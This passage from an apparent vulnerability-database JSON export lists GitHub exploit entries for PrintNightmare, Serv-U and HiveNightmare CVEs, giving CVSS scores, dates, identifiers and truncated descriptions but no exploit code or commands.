"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:59", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T12:10:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:06:09", "id": "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:15:44", "description": "# CVE-2021-1675-LPE-EXP\n**Simple LPE Exploit of CVE-2021-1675** ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:00:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-07T15:32:16", "id": "64AAF745-D50D-575C-B3FF-A09072475502", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:28:18", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-02-22T03:32:28", "id": "21F83D93-118D-50C7-A5C0-B2069237666E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T00:25:23", "description": "# It Was All A Dream\n\nA [CVE-2021-34527](https://msrc.microsoft....", "cvss3": 
{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T20:13:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-23T19:20:20", "id": "0BB19334-D311-5464-B40B-7B27A0AD8825", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T19:52:51", "description": "# CVE-2021-34527 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stew...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T12:10:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T10:57:52", "id": "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T17:02:43", "description": "= Print Nightmare \u5206\u6790\u62a5\u544a\n:imagesdir: Figures\n:toc:\n:icons: font\n:f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-22T10:49:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", 
"CVE-2021-1675"], "modified": "2022-03-16T09:18:03", "id": "F1B229EB-2178-53B9-839E-BA0B916376A2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T17:02:41", "description": "# PrintNightmare\n\nPython implementation for PrintNightmare (CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-26T13:53:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T13:10:07", "id": "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nTwo mini Script to check if th...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:12:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:49:06", "id": "F92F972D-7309-5D0B-BCC2-054883AE83E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:22", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T08:18:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:07:00", "id": "F1347375-6380-5145-9881-486B76875649", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:32", "description": "# Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmar...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T12:25:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:03:49", "id": "B8D9E2C0-202B-5806-88D2-B0E797582618", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T19:32:13", "description": "# Local Privilege 
Escalation Edition of CVE-2021-1675/CVE-2021-3...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:47:13", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-15T16:19:02", "id": "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T23:46:37", "description": "# CVE-2021-34527-CVE-2021-1675\nPrintNightmare+Manual\nhttps://sat...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-19T23:20:58", "type": "githubexploit", "title": "Exploit for Improper 
Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-02-19T23:20:58", "id": "86F04665-0984-596F-945A-3CA176A53057", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T03:44:07", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-29T17:24:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T03:06:53", "id": "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:38:29", "description": "# Serv-U CVE-2021-35211 Exploit\n\n## Potential for DoS - check yo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T05:52:17", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Solarwinds Serv-U", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2023-11-25T19:38:18", "id": "15CF4822-F1E8-5BDB-8E65-8FC88F816E1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:55", "description": "# CVE-2021-36934\nFix for...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 
7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T13:06:51", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-06-18T04:00:43", "id": "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:04", "description": "CVE-2021\u201336934\n\nThe derived hash is used for forgery such as PTH...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T19:39:28", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-09-20T04:02:17", "id": "37A629E7-9341-5873-B641-E06D7998FA58", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:58", "description": "# Overview #\n\nThis is a Datto RMM component to mitigate CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T18:00:35", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-25T18:10:18", "id": "27F005C9-EA16-5734-81D4-8D66FA582FF9", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" 
lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:49:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-30T06:53:48", "id": "F289C7E8-209B-5B15-B6D7-8EBFBBC8BDA8", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-15T12:42:04", "description": "# Invoke-HiveNightmare\nPowerShell-based PoC for CVE-2021-36934, ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T03:07:56", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in 
Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-15T12:11:50", "id": "DA7FA6E3-30A8-5040-A7DA-7D9C064865B7", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:50", "description": "# PyNightmare\nPoC for CVE-2021-36934 Aka HiveNightmare/SeriousSA...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, 